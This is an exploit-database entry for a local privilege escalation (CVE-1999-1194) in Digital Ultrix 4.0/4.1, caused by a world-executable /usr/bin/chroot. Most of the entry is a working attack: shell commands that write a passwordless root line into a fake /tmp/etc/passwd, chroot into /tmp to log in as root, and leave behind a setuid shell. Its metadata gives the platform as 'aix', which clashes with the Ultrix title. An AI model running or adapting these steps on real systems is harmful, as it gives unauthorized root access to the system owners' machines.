Digital Ultrix 4.0/4.1 - '/usr/bin/chroot' Local Privilege Escalation

Author: anonymous
type: local
platform: aix
port: 
date_added: 1991-05-01  
date_updated: 2017-11-16  
verified: 1  
codes: OSVDB-885;CVE-1999-1194  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 19041.txt  

source: https://www.securityfocus.com/bid/17/info

By default, /usr/bin/chroot is improperly installed in Ultrix versions 4.0 and 4.1. Anyone can execute /usr/bin/chroot this can lead to system users to gain unauthorized privileges.

$ mkdir /tmp/etc
$ echo root::0:0::/:/bin/sh > /tmp/etc/passwd
$ mkdir /tmp/bin
$ cp /bin/sh /tmp/bin/sh
$ cp /bin/chmod /tmp/bin/chmod
$ chroot /tmp /bin/login

Then login as root with no password. chmod /tmp/bin/sh
to 4700, exit and run the suid /tmp/bin/sh.